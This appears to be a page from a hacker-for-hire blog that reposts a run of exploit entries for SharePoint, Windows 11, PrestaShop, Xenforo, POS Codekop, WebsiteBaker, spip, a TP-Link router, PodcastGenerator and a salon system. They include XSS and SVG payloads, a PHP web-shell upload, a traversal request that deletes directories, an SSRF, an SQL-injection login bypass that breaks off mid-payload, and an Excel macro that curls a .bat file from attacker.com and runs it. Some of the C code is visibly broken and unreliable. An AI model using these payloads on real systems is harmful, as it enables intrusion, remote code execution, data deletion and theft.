Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863113749

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
// Exploit Title: Microsoft SharePoint Enterprise Server 2016 - Spoofing
// Date: 2023-06-20
// country: Iran
// Exploit Author: Amirhossein Bahramizadeh
// Category : Remote
// Vendor Homepage:
// Microsoft SharePoint Foundation 2013 Service Pack 1
// Microsoft SharePoint Server Subscription Edition
// Microsoft SharePoint Enterprise Server 2013 Service Pack 1
// Microsoft SharePoint Server 2019
// Microsoft SharePoint Enterprise Server 2016
// Tested on: Windows/Linux
// CVE : CVE-2023-28288

#include <windows.h>
#include <stdio.h>


// The vulnerable SharePoint server URL
const char *server_url = "http://example.com/";

// The URL of the fake SharePoint server
const char *fake_url = "http://attacker.com/";

// The vulnerable SharePoint server file name
const char *file_name = "vuln_file.aspx";

// The fake SharePoint server file name
const char *fake_file_name = "fake_file.aspx";

int main()
{
    HANDLE file;
    DWORD bytes_written;
    char file_contents[1024];

    // Create the fake file contents
    sprintf(file_contents, "<html><head></head><body><p>This is a fake file.</p></body></html>");

    // Write the fake file to disk
    file = CreateFile(fake_file_name, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    if (file == INVALID_HANDLE_VALUE)
    {
        printf("Error creating fake file: %d\n", GetLastError());
        return 1;
    }
    if (!WriteFile(file, file_contents, strlen(file_contents), &bytes_written, NULL))
    {
        printf("Error writing fake file: %d\n", GetLastError());
        CloseHandle(file);
        return 1;
    }
    CloseHandle(file);

    // Send a request to the vulnerable SharePoint server to download the file
    sprintf(file_contents, "%s%s", server_url, file_name);
    file = CreateFile(file_name, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    if (file == INVALID_HANDLE_VALUE)
    {
        printf("Error creating vulnerable file: %d\n", GetLastError());
        return 1;
    }
    if (!InternetReadFileUrl(file_contents, file))
    {
        printf("Error downloading vulnerable file: %d\n", GetLastError());
        CloseHandle(file);
        return 1;
    }
    CloseHandle(file);

    // Replace the vulnerable file with the fake file
    if (!DeleteFile(file_name))
    {
        printf("Error deleting vulnerable file: %d\n", GetLastError());
        return 1;
    }
    if (!MoveFile(fake_file_name, file_name))
    {
        printf("Error replacing vulnerable file: %d\n", GetLastError());
        return 1;
    }

    // Send a request to the vulnerable SharePoint server to trigger the vulnerability
    sprintf(file_contents, "%s%s", server_url, file_name);
    if (!InternetReadFileUrl(file_contents, NULL))
    {
        printf("Error triggering vulnerability: %d\n", GetLastError());
        return 1;
    }

    // Print a message indicating that the vulnerability has been exploited
    printf("Vulnerability exploited successfully.\n");

    return 0;
}

BOOL InternetReadFileUrl(const char *url, HANDLE file)
{
    HINTERNET internet, connection, request;
    DWORD bytes_read;
    char buffer[1024];

    // Open an Internet connection
    internet = InternetOpen("Mozilla/5.0 (Windows NT 10.0; Win64; x64)", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);
    if (internet == NULL)
    {
        return FALSE;
    }

    // Connect to the server
    connection = InternetConnect(internet, fake_url, INTERNET_DEFAULT_HTTP_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);
    if (connection == NULL)
    {
        InternetCloseHandle(internet);
        return FALSE;
    }

    // Send the HTTP request
    request = HttpOpenRequest(connection, "GET", url, NULL, NULL, NULL, 0, 0);
    if (request == NULL)
    {
        InternetCloseHandle(connection);
        InternetCloseHandle(internet);
        return FALSE;
    }
    if (!HttpSendRequest(request, NULL, 0, NULL, 0))
    {
        InternetCloseHandle(request);
        InternetCloseHandle(connection);
        InternetCloseHandle(internet);
        return FALSE;
    }

    // Read the response data
    while (InternetReadFile(request, buffer, sizeof(buffer), &bytes_read) && bytes_read > 0)
    {
        if (file != NULL)
        {
            // Write the data to disk
            if (!WriteFile(file, buffer, bytes_read, &bytes_read, NULL))
            {
                InternetCloseHandle(request);
                InternetCloseHandle(connection);
                InternetCloseHandle(internet);
                return FALSE;
            }
        }
    }

    InternetCloseHandle(request);
    InternetCloseHandle(connection);
    InternetCloseHandle(internet);
    return TRUE;
}
HireHackking 
// Exploit Title: Windows 11 22h2 - Kernel Privilege Elevation
// Date: 2023-06-20
// country: Iran
// Exploit Author: Amirhossein Bahramizadeh
// Category : webapps
// Vendor Homepage:
// Tested on: Windows/Linux
// CVE : CVE-2023-28293

#include <windows.h>
#include <stdio.h>

// The vulnerable driver file name
const char *driver_name = "vuln_driver.sys";

// The vulnerable driver device name
const char *device_name = "\\\\.\\VulnDriver";

// The IOCTL code to trigger the vulnerability
#define IOCTL_VULN_CODE 0x222003

// The buffer size for the IOCTL input/output data
#define IOCTL_BUFFER_SIZE 0x1000

int main()
{
    HANDLE device;
    DWORD bytes_returned;
    char input_buffer[IOCTL_BUFFER_SIZE];
    char output_buffer[IOCTL_BUFFER_SIZE];

    // Load the vulnerable driver
    if (!LoadDriver(driver_name, "\\Driver\\VulnDriver"))
    {
        printf("Error loading vulnerable driver: %d\n", GetLastError());
        return 1;
    }

    // Open the vulnerable driver device
    device = CreateFile(device_name, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (device == INVALID_HANDLE_VALUE)
    {
        printf("Error opening vulnerable driver device: %d\n", GetLastError());
        return 1;
    }

    // Fill the input buffer with data to trigger the vulnerability
    memset(input_buffer, 'A', IOCTL_BUFFER_SIZE);

    // Send the IOCTL to trigger the vulnerability
    if (!DeviceIoControl(device, IOCTL_VULN_CODE, input_buffer, IOCTL_BUFFER_SIZE, output_buffer, IOCTL_BUFFER_SIZE, &bytes_returned, NULL))
    {
        printf("Error sending IOCTL: %d\n", GetLastError());
        return 1;
    }

    // Print the output buffer contents
    printf("Output buffer:\n%s\n", output_buffer);

    // Unload the vulnerable driver
    if (!UnloadDriver("\\Driver\\VulnDriver"))
    {
        printf("Error unloading vulnerable driver: %d\n", GetLastError());
        return 1;
    }

    // Close the vulnerable driver device
    CloseHandle(device);

    return 0;
}

BOOL LoadDriver(LPCTSTR driver_name, LPCTSTR service_name)
{
    SC_HANDLE sc_manager, service;
    DWORD error;

    // Open the Service Control Manager
    sc_manager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
    if (sc_manager == NULL)
    {
        return FALSE;
    }

    // Create the service
    service = CreateService(sc_manager, service_name, service_name, SERVICE_ALL_ACCESS, SERVICE_KERNEL_DRIVER, SERVICE_DEMAND_START, SERVICE_ERROR_NORMAL, driver_name, NULL, NULL, NULL, NULL, NULL);
    if (service == NULL)
    {
        error = GetLastError();
        if (error == ERROR_SERVICE_EXISTS)
        {
            // The service already exists, so open it instead
            service = OpenService(sc_manager, service_name, SERVICE_ALL_ACCESS);
            if (service == NULL)
            {
                CloseServiceHandle(sc_manager);
                return FALSE;
            }
        }
        else
        {
            CloseServiceHandle(sc_manager);
            return FALSE;
        }
    }

    // Start the service
    if (!StartService(service, 0, NULL))
    {
        error = GetLastError();
        if (error != ERROR_SERVICE_ALREADY_RUNNING)
        {
            CloseServiceHandle(service);
            CloseServiceHandle(sc_manager);
            return FALSE;
        }
    }

    CloseServiceHandle(service);
    CloseServiceHandle(sc_manager);
    return TRUE;
}

BOOL UnloadDriver(LPCTSTR service_name)
{
    SC_HANDLE sc_manager, service;
    SERVICE_STATUS status;
    DWORD error;

    // Open the Service Control Manager
    sc_manager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
    if (sc_manager == NULL)
    {
        return FALSE;
    }

    // Open the service
    service = OpenService(sc_manager, service_name, SERVICE_ALL_ACCESS);
    if (service == NULL)
    {
        CloseServiceHandle(sc_manager);
        return FALSE;
    }

    // Stop the service
    if (!ControlService(service, SERVICE_CONTROL_STOP, &status))
    {
        error = GetLastError();
        if (error != ERROR_SERVICE_NOT_ACTIVE)
        {
            CloseServiceHandle(service);
            CloseServiceHandle(sc_manager);
            return FALSE;
        }
    }

    // Delete the service
    if (!DeleteService(service))
    {
        CloseServiceHandle(service);
        CloseServiceHandle(sc_manager);
        return FALSE;
    }

    CloseServiceHandle(service);
    CloseServiceHandle(sc_manager);
    return TRUE;
}
HireHackking 
# Exploit Title: MCL-Net 4.3.5.8788 - Information Disclosure
# Date: 5/31/2023
# Exploit Author: Victor A. Morales, GM Sectec Inc.
# Vendor Homepage: https://www.mcl-mobilityplatform.com/net.php
# Version: 4.3.5.8788 (other versions may be affected)
# Tested on: Microsoft Windows 10 Pro
# CVE: CVE-2023-34834

Description:
Directory browsing vulnerability in MCL-Net version 4.3.5.8788 webserver running on default port 5080, allows attackers to gain sensitive information about the configured databases via the "/file" endpoint.

Steps to reproduce:
1. Navigate to the webserver on default port 5080, where "Index of Services" will disclose directories, including the "/file" directory. 
2. Browse to the "/file" directory and database entry folders configured
3. The "AdoInfo.txt" file will contain the database connection strings in plaintext for the configured database. Other files containing database information are also available inside the directory.
HireHackking 
# Exploit Title: PrestaShop Winbiz Payment module - Improper Limitation of a Pathname to a Restricted Directory
# Date: 2023-06-20
# Dork: /modules/winbizpayment/downloads/download.php
# country: Iran
# Exploit Author: Amirhossein Bahramizadeh
# Category : webapps
# Vendor Homepage: https://shop.webbax.ch/modules-pour-winbiz/153-module-prestashop-winbiz-payment-reverse.html
# Version: 17.1.3 (REQUIRED)
# Tested on: Windows/Linux
# CVE : CVE-2023-30198

import requests
import string
import random

# The base URL of the vulnerable site
base_url = "http://example.com"

# The URL of the login page
login_url = base_url + "/authentication.php"

# The username and password for the admin account
username = "admin"
password = "password123"

# The URL of the vulnerable download.php file
download_url = base_url + "/modules/winbizpayment/downloads/download.php"

# The ID of the order to download
order_id = 1234

# The path to save the downloaded file
file_path = "/tmp/order_%d.pdf" % order_id

# The session cookies to use for the requests
session_cookies = None

# Generate a random string for the CSRF token
csrf_token = ''.join(random.choices(string.ascii_uppercase + string.digits, k=32))

# Send a POST request to the login page to authenticate as the admin user
login_data = {"email": username, "passwd": password, "csrf_token": csrf_token}
session = requests.Session()
response = session.post(login_url, data=login_data)

# Save the session cookies for future requests
session_cookies = session.cookies.get_dict()

# Generate a random string for the CSRF token
csrf_token = ''.join(random.choices(string.ascii_uppercase + string.digits, k=32))

# Send a POST request to the download.php file to download the order PDF
download_data = {"id_order": order_id, "csrf_token": csrf_token}
response = session.post(download_url, cookies=session_cookies, data=download_data)

# Save the downloaded file to disk
with open(file_path, "wb") as f:
    f.write(response.content)

# Print a message indicating that the file has been downloaded
print("File downloaded to %s" % file_path)
HireHackking

Azure Apache Ambari 2302250400 - Spoofing

HACKER · %s · %s

# Exploit Title: Azure Apache Ambari 2302250400 - Spoofing # Date: 2023-06-23 # country: Iran # Exploit Author: Amirhossein Bahramizadeh # Category : Remote # Vendor Homepage: Microsoft Apache Ambari Microsoft azure Hdinsights # Tested on: Windows/Linux # CVE : CVE-2023-23408 import requests # Set the URL and headers for the Ambari web interface url = "https://ambari.example.com/api/v1/clusters/cluster_name/services" headers = {"X-Requested-By": "ambari", "Authorization": "Basic abcdefghijklmnop"} # Define a function to validate the headers def validate_headers(headers): if "X-Requested-By" not in headers or headers["X-Requested-By"] != "ambari": return False if "Authorization" not in headers or headers["Authorization"] != "Basic abcdefghijklmnop": return False return True # Define a function to send a request to the Ambari web interface def send_request(url, headers): if not validate_headers(headers): print("Invalid headers") return response = requests.get(url, headers=headers) if response.status_code == 200: print("Request successful") else: print("Request failed") # Call the send_request function with the URL and headers send_request(url, headers)
HireHackking

Xenforo Version 2.2.13 - Authenticated Stored XSS

HACKER · %s · %s

# Exploit Title: Xenforo Version 2.2.13 - Authenticated Stored XSS # Date: 2023-06-24 # Exploit Author: Furkan Karaarslan # Category : Webapps # Vendor Homepage: https://x.com/admin.php?smilies # Version: 2.2.12 (REQUIRED) # Tested on: Windows/Linux # CVE : ----------------------------------------------------------------------------- Requests POST /admin.php?smilie-categories/0/save HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1/admin.php?smilies/ X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------333176689514537912041638543422 Content-Length: 1038 Origin: http://127.0.0.1 Connection: close Cookie: xf_csrf=aEWkQ90jbPs2RECi; xf_session=yCLGXIhbOq9bSNKAsymJPWYVvTotiofa; xf_session_admin=wlr6UqjWxCkpfjKlngAvH5t-4yGiK5mQ Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------333176689514537912041638543422 Content-Disposition: form-data; name="_xfToken" 1687616851,83fd2350307156281e51b17e20fe575b -----------------------------333176689514537912041638543422 Content-Disposition: form-data; name="title" <img src=x onerror=alert(document.domain)> -----------------------------333176689514537912041638543422 Content-Disposition: form-data; name="display_order" 1 -----------------------------333176689514537912041638543422 Content-Disposition: form-data; name="_xfRequestUri" /admin.php?smilies/ -----------------------------333176689514537912041638543422 Content-Disposition: form-data; name="_xfWithData" 1 -----------------------------333176689514537912041638543422 Content-Disposition: form-data; name="_xfToken" 1687616849,b74724a115448b864ba2db8f89f415f5 -----------------------------333176689514537912041638543422 Content-Disposition: form-data; name="_xfResponseType" json -----------------------------333176689514537912041638543422-- Response: After it is created, an alert comes immediately.
HireHackking

POS Codekop v2.0 - Authenticated Remote Code Execution (RCE)

HACKER · %s · %s

# Exploit Title: POS Codekop v2.0 - Authenticated Remote Code Execution (RCE) # Date: 25-05-2023 # Exploit Author: yuyudhn # Vendor Homepage: https://www.codekop.com/ # Software Link: https://github.com/fauzan1892/pos-kasir-php # Version: 2.0 # Tested on: Linux # CVE: CVE-2023-36348 # Vulnerability description: The application does not sanitize the filename parameter when sending data to /fungsi/edit/edit.php?gambar=user. An attacker can exploit this issue by uploading a PHP file and accessing it, leading to Remote Code Execution. # Reference: https://yuyudhn.github.io/pos-codekop-vulnerability/ # Proof of Concept: 1. Login to POS Codekop dashboard. 2. Go to profile settings. 3. Upload PHP script through Upload Profile Photo. Burp Log Example: ``` POST /research/pos-kasir-php/fungsi/edit/edit.php?gambar=user HTTP/1.1 Host: localhost Content-Length: 8934 Cache-Control: max-age=0 sec-ch-ua: sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "" **Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymVBHqH4m6KgKBnpa User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-User: ?1** Sec-Fetch-Dest: document Referer: http://localhost/research/pos-kasir-php/index.php?page=user Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=vqlfiarme77n1r4o8eh2kglfhv Connection: close ------WebKitFormBoundarymVBHqH4m6KgKBnpa Content-Disposition: form-data; name="foto"; filename="asuka-rce.php" Content-Type: image/jpeg ÿØÿà JFIF HHÿþ6<?php passthru($_GET['cmd']); __halt_compiler(); ?> ÿÛC ----------------------------- ``` PHP Web Shell location: http://localhost/research/pos-kasir-php/assets/img/user/[random_number]asuka-rce.php
HireHackking

WebsiteBaker v2.13.3 - Stored XSS

HACKER · %s · %s

Exploit Title: WebsiteBaker v2.13.3 - Stored XSS Application: WebsiteBaker Version: 2.13.3 Bugs: Stored XSS Technology: PHP Vendor URL: https://websitebaker.org/pages/en/home.php Software Link: https://wiki.websitebaker.org/doku.php/en/downloads Date of found: 26.06.2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== steps: 1. login to account 2. go to media 3. upload svg file """ <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.location); </script> </svg> """ 4. go to svg file (http://localhost/media/malas.svg)
HireHackking
## Title:Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074) 32-bit - Remote Code Execution (RCE) ## Author: nu11secur1ty ## Date: 06.27.2023 ## Vendor: https://www.microsoft.com/ ## Software: https://www.microsoft.com/en-us/microsoft-365/excel ## Reference: https://portswigger.net/daily-swig/rce ## CVE-2023-33137 ## Description: This exploit is connected with third part exploit server, which waits for the victim to call him and execute the content from him using the pipe posting method! This is absolutely a 0-day exploit! This is absolutely dangerous for the victims, who are infected by him! When the victim hit the button in the Excel file, it makes a POST request to the exploit server, and the server is responding back that way: He creates another hidden malicious file and executed it directly on the machine of the victim, then everything is disappeared, so nasty. STATUS: HIGH Vulnerability WARNING: THIS IS VERY DANGER for the usual users! [+]Exploit: ```vbs Sub AutoOpen() Call Shell("cmd.exe /S /c" & "curl -s https://attacker.com/nu11secur1ty/somwhere/ontheinternet/maloumnici.bat > maloumnici.bat && .\maloumnici.bat", vbNormalFocus) End Sub ``` ## Reproduce: [href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33137) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2023/06/microsoft-excel-microsoft-365-mso.html) ## Time spend: 01:27:00
HireHackking

WebsiteBaker v2.13.3 - Directory Traversal

HACKER · %s · %s

Exploit Title: WebsiteBaker v2.13.3 - Directory Traversal Application: WebsiteBaker Version: 2.13.3 Bugs: Directory Traversal Technology: PHP Vendor URL: https://websitebaker.org/pages/en/home.php Software Link: https://wiki.websitebaker.org/doku.php/en/downloads Date of found: 26.06.2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================= arbitary directory deleting GET /admin/media/delete.php?dir=/../../../../../..//var/www&id=a838b6ebe8ba43a0 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Referer: http://localhost/admin/media/browse.php?dir=/../../../../../..//var/www Cookie: PHPSESSID-WB-6e6c39=bvnampsc5ji2drm439ph49143c; klaro=%7B%22klaro%22%3Atrue%2C%22mathCaptcha%22%3Atrue%7D Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin
HireHackking

spip v4.1.10 - Spoofing Admin account

HACKER · %s · %s

## Exploit Title: spip v4.1.10 - Spoofing Admin account ## Author: nu11secur1ty ## Date: 06.29.2023 ## Vendor: https://www.spip.net/en_rubrique25.html ## Software: https://files.spip.net/spip/archives/spip-v4.1.10.zip ## Reference: https://www.crowdstrike.com/cybersecurity-101/spoofing-attacks/ ## Description: The malicious user can upload a malicious SVG file which file is not filtered by a security function, and he can trick the administrator of this system to check his logo by clicking on him and visiting, maybe a very dangerous URL. Wrong web app website logic, and not well sanitizing upload function. STATUS: HIGH- Vulnerability [+]Exploit: ```SVG <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"> <defs> <linearGradient id="badgeGradient"> <stop offset="0"/> <stop offset="1"/> </linearGradient> </defs> <g id="heading"> <a xlink:href= "https://rb.gy/74f0y"> <path id="badge" d="M 29.6,22.8 C 29.2,23.4 24.3,22.4 23.8,22.9 C 23.4,23.3 24.3,28.3 23.8,28.6 C 23.2,28.9 19.4,25.6 18.8,25.8 C 18.2,26.0 16.5,30.7 15.8,30.7 C 15.2,30.7 13.5,26.0 12.9,25.8 C 12.3,25.6 8.5,28.9 7.9,28.6 C 7.4,28.3 8.3,23.3 7.9,22.9 C 7.4,22.4 2.4,23.4 2.1,22.8 C 1.8,22.3 5.1,18.4 4.9,17.8 C 4.8,17.2 0.0,15.5 0.0,14.9 C 0.0,14.3 4.8,12.6 4.9,12.0 C 5.1,11.4 1.8,7.5 2.1,7.0 C 2.4,6.4 7.4,7.3 7.9,6.9 C 8.3,6.5 7.4,1.5 7.9,1.2 C 8.5,0.9 12.3,4.1 12.9,4.0 C 13.5,3.8 15.2,-0.8 15.8,-0.8 C 16.5,-0.8 18.2,3.8 18.8,4.0 C 19.4,4.1 23.2,0.9 23.8,1.2 C 24.3,1.5 23.4,6.5 23.8,6.9 C 24.3,7.3 29.2,6.4 29.6,7.0 C 29.9,7.5 26.6,11.4 26.8,12.0 C 26.9,12.6 31.7,14.3 31.7,14.9 C 31.7,15.5 26.9,17.2 26.8,17.8 C 26.6,18.4 29.9,22.3 29.6,22.8 z"/> <!--<text id="label" x="5" y="20" transform = "rotate(-15 10 10)">New</text>--> <text id="title" x="40" y="20">Please click on the logo, to see our design services, on our website, thank you!</text> </a> </g> </svg> ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/SPIP/SPIP-4.1.10) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2023/06/spip-v4110-spoofing-admin-account.html) ## Time spend: 00:37:00
HireHackking

TP-Link TL-WR940N V4 - Buffer OverFlow

HACKER · %s · %s

# Exploit Title: TP-Link TL-WR940N V4 - Buffer OverFlow # Date: 2023-06-30 # country: Iran # Exploit Author: Amirhossein Bahramizadeh # Category : hardware # Dork : /userRpm/WanDynamicIpV6CfgRpm # Tested on: Windows/Linux # CVE : CVE-2023-36355 import requests # Replace the IP address with the router's IP router_ip = '192.168.0.1' # Construct the URL with the vulnerable endpoint and parameter url = f'http://{router_ip}/userRpm/WanDynamicIpV6CfgRpm?ipStart=' # Replace the payload with a crafted payload that triggers the buffer overflow payload = 'A' * 5000 # Example payload, adjust the length as needed # Send the GET request with the crafted payload response = requests.get(url + payload) # Check the response status code if response.status_code == 200: print('Buffer overflow triggered successfully') else: print('Buffer overflow not triggered')
HireHackking

GZ Forum Script 1.8 - Stored Cross-Site Scripting (XSS)

HACKER · %s · %s

# Exploit Title: GZ Forum Script 1.8 - Stored Cross-Site Scripting (XSS) # Date: 30/06/2023 # Exploit Author: CraCkEr # Vendor: GZ Scripts # Vendor Homepage: https://gzscripts.com/ # Software Link: https://gzscripts.com/gz-forum-script.html # Version: 1.8 # Tested on: Windows 10 Pro # Impact: Manipulate the content of the site ## Release Notes: Reflected XSS: The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials Stored XSS Allow Attacker to inject malicious code into website, give ability to steal sensitive information, manipulate data, and launch additional attacks. ## Reflected XSS Path: /preview.php GET 'catid' parameter is vulnerable to RXSS http://www.website/preview.php?controller=Load&action=index&catid=moztj%22%3e%3cscript%3ealert(1)%3c%2fscript%3ems3ea&down_up=a Path: /preview.php GET 'topicid' parameter is vulnerable to RXSS http://www.website/preview.php?controller=Load&action=topic&topicid=1wgaff%22%3e%3cscript%3ealert(1)%3c%2fscript%3exdhk2 ## Stored XSS ----------------------------------------------- POST /GZForumScript/preview.php?controller=Load&action=start_new_topic HTTP/1.1 -----------------------------39829578812616571248381709325 Content-Disposition: form-data; name="free_name" <script>alert(1)</script> -----------------------------39829578812616571248381709325 Content-Disposition: form-data; name="topic" <script>alert(1)</script> -----------------------------39829578812616571248381709325 Content-Disposition: form-data; name="topic_message" <script>alert(1)</script> -----------------------------39829578812616571248381709325-- ----------------------------------------------- POST parameter 'free_name' is vulnerable to XSS POST parameter 'topic' is vulnerable to XSS POST parameter 'topic_message' is vulnerable to XSS ## Steps to Reproduce: 1. As a [Guest User] Click on [New Topic] to create a "New Topic" on this Path (http://website/preview.php?controller=Load&action=start_new_topic) 2. Inject your [XSS Payload] in "Name" 3. Inject your [XSS Payload] in "Topic Title " 4. Inject your [XSS Payload] in "Topic Message" 5. Submit 4. XSS Fired on Visitor Browser's when they Visit the Topic you Infect your [XSS Payload] on 5. XSS Fired on ADMIN Browser when he visit [Dashboard] in Administration Panel on this Path (https://website/GzAdmin/dashboard) 6. XSS Fired on ADMIN Browser when he visit [Topic] & [All Topics] to check [New Topics] on this Path (https://website/GzTopic/index)
HireHackking

PodcastGenerator 3.2.9 - Blind SSRF via XML Injection

HACKER · %s · %s

#Exploit Title: PodcastGenerator 3.2.9 - Blind SSRF via XML Injection #Application: PodcastGenerator #Version: v3.2.9 #Bugs: Blind SSRF via XML Injection #Technology: PHP #Vendor URL: https://podcastgenerator.net/ #Software Link: https://github.com/PodcastGenerator/PodcastGenerator #Date of found: 01-07-2023 #Author: Mirabbas Ağalarov #Tested on: Linux 2. Technical Details & POC ======================================== steps: 1. Go to 'Upload New Episodes' (http://localhost/PodcastGenerator/admin/episodes_upload.php) 2. Fill all section and Short Description section set as 'test]]></shortdescPG><imgPG path="">( example :Attacker domain)http://localhost:3132</imgPG><shortdescPG><![CDATA[test' payload: test]]></shortdescPG><imgPG path="">http://localhost:3132</imgPG><shortdescPG><![CDATA[test By the way i used localhost.If you have domain, you can use domain. 3.And upload episodes 4. I am listening on port 3132 because I'm observating for incoming requests nc -lvp 3132 5. And I receive request request: POST /PodcastGenerator/admin/episodes_upload.php HTTP/1.1 Host: localhost Content-Length: 101563 Cache-Control: max-age=0 sec-ch-ua: sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypRUTcUa48pmEcI6Q User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/PodcastGenerator/admin/episodes_upload.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=rsvvc28on2q91ael2fiou3nad3 Connection: close ------WebKitFormBoundarypRUTcUa48pmEcI6Q Content-Disposition: form-data; name="file"; filename="2023-07-01_2023-07-01_2023-07-01_4_photo-1575936123452-b67c3203c357_1_ (2).jpeg" Content-Type: image/jpeg image content blaaahblahasdfjblaaah;sdfblaaahasdf asdfasdfadddblaaahdblaaahddddblaaahddddddblaaahblaaahblaaahdddblaaahddddblaaahdblaaahddblaaahdddddblaaahddddddddddd ------WebKitFormBoundarypRUTcUa48pmEcI6Q Content-Disposition: form-data; name="title" test ------WebKitFormBoundarypRUTcUa48pmEcI6Q Content-Disposition: form-data; name="shortdesc" test]]></shortdescPG><imgPG path="">http://localhost:3132</imgPG><shortdescPG><![CDATA[test ------WebKitFormBoundarypRUTcUa48pmEcI6Q Content-Disposition: form-data; name="date" 2023-07-01 ------WebKitFormBoundarypRUTcUa48pmEcI6Q Content-Disposition: form-data; name="time" 17:02 ------WebKitFormBoundarypRUTcUa48pmEcI6Q Content-Disposition: form-data; name="episodecover"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundarypRUTcUa48pmEcI6Q Content-Disposition: form-data; name="longdesc" test ------WebKitFormBoundarypRUTcUa48pmEcI6Q Content-Disposition: form-data; name="episodenum" 33 ------WebKitFormBoundarypRUTcUa48pmEcI6Q Content-Disposition: form-data; name="seasonnum" 33 ------WebKitFormBoundarypRUTcUa48pmEcI6Q Content-Disposition: form-data; name="itunesKeywords" ------WebKitFormBoundarypRUTcUa48pmEcI6Q Content-Disposition: form-data; name="explicit" no ------WebKitFormBoundarypRUTcUa48pmEcI6Q Content-Disposition: form-data; name="authorname" ------WebKitFormBoundarypRUTcUa48pmEcI6Q Content-Disposition: form-data; name="authoremail" ------WebKitFormBoundarypRUTcUa48pmEcI6Q Content-Disposition: form-data; name="customtags" ------WebKitFormBoundarypRUTcUa48pmEcI6Q Content-Disposition: form-data; name="token" vdzM0jc75uLMHV7ovxew8Dawh5mnWSpz ------WebKitFormBoundarypRUTcUa48pmEcI6Q--
HireHackking

Beauty Salon Management System v1.0 - SQLi

HACKER · %s · %s

# Exploit Title: Beauty Salon Management System v1.0 - SQLi # Date of found: 04/07/2023 # Exploit Author: Fatih Nacar # Version: V1.0 # Tested on: Windows 10 # Vendor Homepage: https://www.campcodes.com <https://www.campcodes.com/projects/retro-cellphone-online-store-an-e-commerce-project-in-php-mysqli/> # Software Link: https://www.campcodes.com/projects/beauty-salon-management-system-in-php-and-mysqli/ # CWE: CWE-89 Vulnerability Description - Beauty Salon Management System: V1.0, developed by Campcodes, has been found to be vulnerable to SQL Injection (SQLI) attacks. This vulnerability allows an attacker to manipulate login authentication with the SQL queries and bypass authentication. The system fails to properly validate user-supplied input in the username and password fields during the login process, enabling an attacker to inject malicious SQL code. By exploiting this vulnerability, an attacker can bypass authentication and gain unauthorized access to the system. Steps to Reproduce - The following steps outline the exploitation of the SQL Injection vulnerability in Beauty Salon Management System V1.0: 1. Open the admin login page by accessing the URL: http://localhost/Chic%20Beauty%20Salon%20System/admin/index.php 2. In the username and password fields, insert the following SQL Injection payload shown inside brackets to bypass authentication for usename parameter: {Payload: username=admin' AND 6374=(SELECT 